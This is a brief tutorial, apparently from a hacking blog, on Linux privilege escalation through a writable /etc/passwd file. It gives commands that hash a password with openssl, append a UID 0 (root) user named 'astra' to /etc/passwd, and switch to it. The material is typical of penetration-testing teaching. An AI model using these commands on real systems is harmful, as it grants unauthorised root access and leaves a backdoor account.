Privilege Escalation: Writing a User to /etc/passwd

Sometimes an application will be misconfigured and will have the capability to read/write to the /etc/passwd file. This code below creates a hashed password and demonstrates how to echo that into the /etc/passwd file.

# generate a password
openssl passwd -1

# manually enter your password below... it will ask twice.
i<3hacking

# outputs this hashed password string
$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.

# create user in /etc/passwd
echo 'astra:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:astra:/home/astra:/bin/bash' >> /etc/passwd

# switch user
su astra

# id
id

Further Reading

https://www.cyberciti.biz/faq/understanding-etcpasswd-file-format/

LEAVE A REPLY

Please enter your comment!
Please enter your name here